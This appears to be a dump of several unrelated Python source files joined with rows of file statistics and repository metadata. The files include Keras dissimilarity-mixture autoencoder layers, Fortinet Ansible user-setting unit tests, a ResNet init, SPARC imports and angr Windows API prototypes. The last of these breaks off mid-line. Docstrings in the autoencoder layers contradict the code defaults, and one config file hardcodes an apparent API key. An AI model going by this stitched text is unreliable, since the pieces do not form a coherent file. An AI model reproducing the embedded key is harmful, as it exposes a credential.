pi_tilde = _tf.reduce_sum(
assigns * self.mixers,
axis=1
)
return mu_tilde, pi_tilde
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"],
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"],
)
super(DissimilarityMixtureAutoencoder, self).build(input_shape)
class DissimilarityMixtureEncoder(_Layer):
"""
A tf.keras layer that implements the dissimilarity mixture encoder (DM-Encoder).
It computes the soft assignments using a dissimilarity function from
:mod:`dmae.dissimilarities`.
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.euclidean`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.euclidean,
trainable={"centers": True, "mixers": False},
initializers={
"centers": _RandomUniform(-1, 1),
"mixers": _Constant(1.0)
},
regularizers={"centers": None, "mixers": None},
**kwargs
):
self.__alpha = _tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureEncoder, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DM-Encoder.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
S : array_like
Soft assignments.
"""
# compute pairwise dissimilarities
D = self.__dissimilarity(x, self.centers)
# compute the soft assignments
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.nn.relu(self.mixers))
)
return assigns
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"]
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"]
)
super(DissimilarityMixtureEncoder, self).build(input_shape)
class DissimilarityMixtureAutoencoderCov(_Layer):
"""
A :mod:`tf.keras` layer with the Dissimilarity Mixture Autoencoder (DMAE).
This layer includes a covariance parameter for dissimilarities that allow it.
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.mahalanobis`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "cov": True, mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "cov": :mod:`RandomUniform(-1, 1)`
"mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "cov": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.mahalanobis,
trainable={"centers": True, "cov": True, "mixers": True},
initializers={
"centers": _RandomUniform(-1, 1),
"cov": _RandomUniform(-1, 1),
"mixers": _Constant(1.0),
},
grad_modifier=1,
regularizers={"centers": None, "cov": None, "mixers": None},
**kwargs
):
self.__alpha =_tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureAutoencoderCov, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DMAE.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
mu_tilde : array_like
Soft-assigned centroids.
Cov_hat : array_like
Soft-assigned covariance matrices.
pi_tilde : array_like
Soft-assigned mixing coefficients.
"""
# compute PSD matrix.
cov =_tf.matmul(self.cov,_tf.transpose(self.cov, [0, 2, 1]))
# compute pairwise dissimilarities.
D = self.__dissimilarity(x, self.centers, cov)
# compute the soft assignments.
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.nn.relu(self.mixers))
)
# soft-assigned centroids
mu_hat = _tf.matmul(
assigns, self.centers
)
# soft-assigned covariance matrices
Cov_hat = _tf.tensordot(
assigns, cov, axes=[[1], [0]]
)
# soft-assigned mixing coefficients
pi_tilde = _tf.reduce_sum(
assigns * self.mixers,
axis=1
)
return mu_hat, Cov_hat, pi_tilde
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"]
)
self.cov = self.add_weight(
name="cov",
initializer=self.__initializers["cov"],
shape=(self.__n_clusters, input_shape[1], input_shape[1]),
trainable=self.__trainable["cov"],
regularizer=self.__regularizers["cov"]
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"]
)
super(DissimilarityMixtureAutoencoderCov, self).build(input_shape)
class DissimilarityMixtureEncoderCov(_Layer):
"""
A tf.keras layer that implements the dissimilarity mixture encoder (DM-Encoder).
It computes the soft assignments using a dissimilarity function from
:mod:`dmae.dissimilarities`. This layer includes a covariance parameter for
dissimilarities that allow it.
Parameters
----------
alpha : float
Softmax inverse temperature.
n_clusters : int
Number of clusters.
dissimilarity : function, default = :mod:`dmae.dissimilarities.mahalanobis`
A tensorflow function that computes a pairwise dissimilarity function
between a batch of points and the cluster's parameters.
trainable : dict, default = {"centers": True, "cov": True, mixers": True}
Specifies which parameters are trainable.
initializers : dict, default = {"centers": :mod:`RandomUniform(-1, 1)`, "cov": :mod:`RandomUniform(-1, 1)`
"mixers": :mod:`Constant(1.0)`}
Specifies a keras initializer (:mod:`tf.keras.initializers`) for each parameter.
regularizers : dict, default = {"centers": None, "cov": None, "mixers": None}
Specifies a keras regularizer (:mod:`tf.keras.regularizers`) for each parameter.
"""
def __init__(
self, alpha, n_clusters,
dissimilarity=_dissimilarities.mahalanobis,
trainable={"centers": True, "cov": True, "mixers": True},
initializers={
"centers": _RandomUniform(-1, 1),
"cov": _RandomUniform(-1, 1),
"mixers": _Constant(1.0),
},
regularizers={"centers": None, "cov": None, "mixers": None},
**kwargs
):
self.__alpha = _tf.constant(alpha, dtype=_tf.float32)
self.__n_clusters = n_clusters
self.__dissimilarity = dissimilarity
self.__trainable = trainable
self.__initializers = initializers
self.__regularizers = regularizers
super(DissimilarityMixtureEncoderCov, self).__init__(**kwargs)
def call(self, x):
"""
Forward pass in DM-Encoder.
Parameters
----------
x : array_like
Input tensor.
Returns
-------
S : array_like
Soft assignments.
"""
# computes PSD matrix
cov = _tf.matmul(self.cov, _tf.transpose(self.cov, [0, 2, 1]))
# computes pairwise dissimilarities.
D = self.__dissimilarity(
x, self.centers, cov
)
# computes the soft assignments.
assigns = _tf.nn.softmax(
-self.__alpha * D +\
_tf.math.log(_tf.nn.relu(self.mixers))
)
return assigns
def build(self, input_shape):
"""
Builds the tensorflow variables.
Parameters
----------
input_shape : tuple
Input tensor shape.
"""
self.centers = self.add_weight(
name="centers",
initializer=self.__initializers["centers"],
shape=(self.__n_clusters, input_shape[1]),
trainable=self.__trainable["centers"],
regularizer=self.__regularizers["centers"]
)
self.cov = self.add_weight(
name="cov",
initializer=self.__initializers["cov"],
shape=(self.__n_clusters, input_shape[1], input_shape[1]),
trainable=self.__trainable["cov"],
regularizer=self.__regularizers["cov"]
)
self.mixers = self.add_weight(
name="mixers",
initializer=self.__initializers["mixers"],
shape=(1, self.__n_clusters),
trainable=self.__trainable["mixers"],
regularizer=self.__regularizers["mixers"]
)
super(DissimilarityMixtureEncoderCov, self).build(input_shape)
| 35.098214 | 110 | 0.574917 | 1,482 | 15,724 | 5.888664 | 0.099865 | 0.026813 | 0.020855 | 0.01948 | 0.899049 | 0.886444 | 0.880028 | 0.872694 | 0.862152 | 0.833734 | 0 | 0.006701 | 0.316713 | 15,724 | 447 | 111 | 35.176734 | 0.805566 | 0.359959 | 0 | 0.745192 | 0 | 0 | 0.04466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.019231 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e65622f4a7635895c06d92b19bd9b8d121193d4b | 123 | py | Python | mmdet/models/backbones/__init__.py | JwDong2019/CVWC-2019-FCOS | 9c343dc820aea7bc79ee0b8206527fa48ebf106f | [
"Apache-2.0"
] | null | null | null | mmdet/models/backbones/__init__.py | JwDong2019/CVWC-2019-FCOS | 9c343dc820aea7bc79ee0b8206527fa48ebf106f | [
"Apache-2.0"
] | null | null | null | mmdet/models/backbones/__init__.py | JwDong2019/CVWC-2019-FCOS | 9c343dc820aea7bc79ee0b8206527fa48ebf106f | [
"Apache-2.0"
] | null | null | null | from .resnet import ResNet, make_res_layer
from .resnext import ResNeXt
__all__ = ['ResNet', 'make_res_layer', 'ResNeXt']
| 24.6 | 49 | 0.764228 | 17 | 123 | 5.058824 | 0.470588 | 0.232558 | 0.302326 | 0.418605 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 123 | 4 | 50 | 30.75 | 0.796296 | 0 | 0 | 0 | 0 | 0 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0515389e10f64171d85b734c386c1b0c6ac3f789 | 49 | py | Python | instance/config.py | mazimpakar/News-Highlight | dfbf9289fc3e37dd7772ca18003eadeb1855425e | [
"MIT"
] | null | null | null | instance/config.py | mazimpakar/News-Highlight | dfbf9289fc3e37dd7772ca18003eadeb1855425e | [
"MIT"
] | null | null | null | instance/config.py | mazimpakar/News-Highlight | dfbf9289fc3e37dd7772ca18003eadeb1855425e | [
"MIT"
] | null | null | null | NEWS_API_KEY = 'f64a31e5dca5460ab7e3f34713eb9670' | 49 | 49 | 0.897959 | 4 | 49 | 10.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.425532 | 0.040816 | 49 | 1 | 49 | 49 | 0.468085 | 0 | 0 | 0 | 0 | 0 | 0.64 | 0.64 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
056de49aa4594abbb2d12a3998b696e0daec2cf8 | 9,824 | py | Python | v6.0.5/user/test_fortios_user_setting.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 14 | 2018-09-25T20:35:25.000Z | 2021-07-14T04:30:54.000Z | v6.0.5/user/test_fortios_user_setting.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 32 | 2018-10-09T04:13:42.000Z | 2020-05-11T07:20:28.000Z | v6.0.5/user/test_fortios_user_setting.py | fortinet-solutions-cse/ansible_fgt_modules | c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719 | [
"Apache-2.0"
] | 11 | 2018-10-09T00:14:53.000Z | 2021-11-03T10:54:09.000Z | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_setting
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_setting.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_setting_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_setting_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_setting_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_setting_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_setting': {
'random_attribute_not_valid': 'tag',
'auth_blackout_time': '3',
'auth_ca_cert': 'test_value_4',
'auth_cert': 'test_value_5',
'auth_http_basic': 'enable',
'auth_invalid_max': '7',
'auth_lockout_duration': '8',
'auth_lockout_threshold': '9',
'auth_portal_timeout': '10',
'auth_secure_http': 'enable',
'auth_src_mac': 'enable',
'auth_ssl_allow_renegotiation': 'enable',
'auth_timeout': '14',
'auth_timeout_type': 'idle-timeout',
'auth_type': 'http',
'radius_ses_timeout_act': 'hard-timeout'
},
'vdom': 'root'}
is_error, changed, response = fortios_user_setting.fortios_user(input_data, fos_instance)
expected_data = {
'auth-blackout-time': '3',
'auth-ca-cert': 'test_value_4',
'auth-cert': 'test_value_5',
'auth-http-basic': 'enable',
'auth-invalid-max': '7',
'auth-lockout-duration': '8',
'auth-lockout-threshold': '9',
'auth-portal-timeout': '10',
'auth-secure-http': 'enable',
'auth-src-mac': 'enable',
'auth-ssl-allow-renegotiation': 'enable',
'auth-timeout': '14',
'auth-timeout-type': 'idle-timeout',
'auth-type': 'http',
'radius-ses-timeout-act': 'hard-timeout'
}
set_method_mock.assert_called_with('user', 'setting', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| 37.212121 | 133 | 0.627036 | 1,153 | 9,824 | 5.063313 | 0.160451 | 0.054813 | 0.035629 | 0.038541 | 0.819801 | 0.804042 | 0.78777 | 0.78777 | 0.78777 | 0.78777 | 0 | 0.01457 | 0.231474 | 9,824 | 263 | 134 | 37.353612 | 0.758676 | 0.06759 | 0 | 0.840376 | 0 | 0 | 0.414808 | 0.147528 | 0 | 0 | 0 | 0 | 0.112676 | 1 | 0.023474 | false | 0 | 0.037559 | 0 | 0.065728 | 0.004695 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
058a99f0f0c18bec63b4315725aca5cd255ff2f4 | 148 | py | Python | rat-sql-gap/seq2struct/models/sparc/__init__.py | JuruoMP/Text2SQL-Multiturn | 1c7d1a93d638650a63959327a07c804d1d013e0e | [
"Apache-2.0"
] | null | null | null | rat-sql-gap/seq2struct/models/sparc/__init__.py | JuruoMP/Text2SQL-Multiturn | 1c7d1a93d638650a63959327a07c804d1d013e0e | [
"Apache-2.0"
] | null | null | null | rat-sql-gap/seq2struct/models/sparc/__init__.py | JuruoMP/Text2SQL-Multiturn | 1c7d1a93d638650a63959327a07c804d1d013e0e | [
"Apache-2.0"
] | null | null | null | from . import sparc_dec_func
from . import sparc_beam_search
from . import sparc_enc_modules
from . import sparc_enc
from . import sparc_match_utils | 29.6 | 31 | 0.837838 | 24 | 148 | 4.791667 | 0.458333 | 0.434783 | 0.652174 | 0.313043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128378 | 148 | 5 | 32 | 29.6 | 0.891473 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
05911e43287fdf4f500027aa0ee73b7c7c9f3cc8 | 70 | py | Python | app/controller/__init__.py | unbyte/we-are-fine | 141eb3fa2deb220ccd5e2f98bf34cf234619b8b2 | [
"MIT"
] | 4 | 2020-03-22T05:37:21.000Z | 2020-03-25T01:50:36.000Z | app/controller/__init__.py | unbyte/we-are-fine | 141eb3fa2deb220ccd5e2f98bf34cf234619b8b2 | [
"MIT"
] | 1 | 2020-04-15T14:35:19.000Z | 2020-04-17T05:18:35.000Z | app/controller/__init__.py | unbyte/we-are-fine | 141eb3fa2deb220ccd5e2f98bf34cf234619b8b2 | [
"MIT"
] | null | null | null | from .record import *
from .user import *
def initialize():
pass
| 11.666667 | 21 | 0.671429 | 9 | 70 | 5.222222 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228571 | 70 | 5 | 22 | 14 | 0.87037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
553f8a2c86a1edb3bfe51d1c4772edd2c6de8d4f | 109 | py | Python | ax_get/__init__.py | TechPowerAwaits/ax-get | 5eece2cecf99d2b6d2d8f248badb98007c76919e | [
"0BSD"
] | null | null | null | ax_get/__init__.py | TechPowerAwaits/ax-get | 5eece2cecf99d2b6d2d8f248badb98007c76919e | [
"0BSD"
] | 2 | 2021-08-15T04:01:49.000Z | 2022-01-05T23:13:45.000Z | ax_get/__init__.py | TechPowerAwaits/ax-get | 5eece2cecf99d2b6d2d8f248badb98007c76919e | [
"0BSD"
] | null | null | null | import ax_get.posix_compat as posix_compat
import ax_get.script as script
import ax_get.tmp_name as tmp_name
| 27.25 | 42 | 0.862385 | 22 | 109 | 3.954545 | 0.409091 | 0.275862 | 0.37931 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110092 | 109 | 3 | 43 | 36.333333 | 0.896907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
557d699181911a986ee5dbc4f98699694cbf7420 | 22,445 | py | Python | angr/procedures/definitions/win32_winhvemulation.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_winhvemulation.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_winhvemulation.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("winhvemulation.dll")
prototypes = \
{
#
'WHvEmulatorCreateEmulator': SimTypeFunction([SimTypePointer(SimStruct({"Size": SimTypeInt(signed=False, label="UInt32"), "Reserved": SimTypeInt(signed=False, label="UInt32"), "WHvEmulatorIoPortCallback": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"Direction": SimTypeChar(label="Byte"), "Port": SimTypeShort(signed=False, label="UInt16"), "AccessSize": SimTypeShort(signed=False, label="UInt16"), "Data": SimTypeInt(signed=False, label="UInt32")}, name="WHV_EMULATOR_IO_ACCESS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "IoAccess"]), offset=0), "WHvEmulatorMemoryCallback": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimStruct({"GpaAddress": SimTypeLongLong(signed=False, label="UInt64"), "Direction": SimTypeChar(label="Byte"), "AccessSize": SimTypeChar(label="Byte"), "Data": SimTypeFixedSizeArray(SimTypeChar(label="Byte"), 8)}, name="WHV_EMULATOR_MEMORY_ACCESS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Context", "MemoryAccess"]), offset=0), "WHvEmulatorGetVirtualProcessorRegisters": SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="WHV_REGISTER_NAME"), label="LPArray", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimUnion({"Reg128": SimUnion({"Anonymous": SimStruct({"Low64": SimTypeLongLong(signed=False, label="UInt64"), "High64": SimTypeLongLong(signed=False, label="UInt64")}, name="_Anonymous_e__Struct", pack=False, align=None), "Dword": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 4)}, name="<anon>", label="None"), "Reg64": SimTypeLongLong(signed=False, label="UInt64"), "Reg32": SimTypeInt(signed=False, label="UInt32"), "Reg16": SimTypeShort(signed=False, label="UInt16"), "Reg8": 
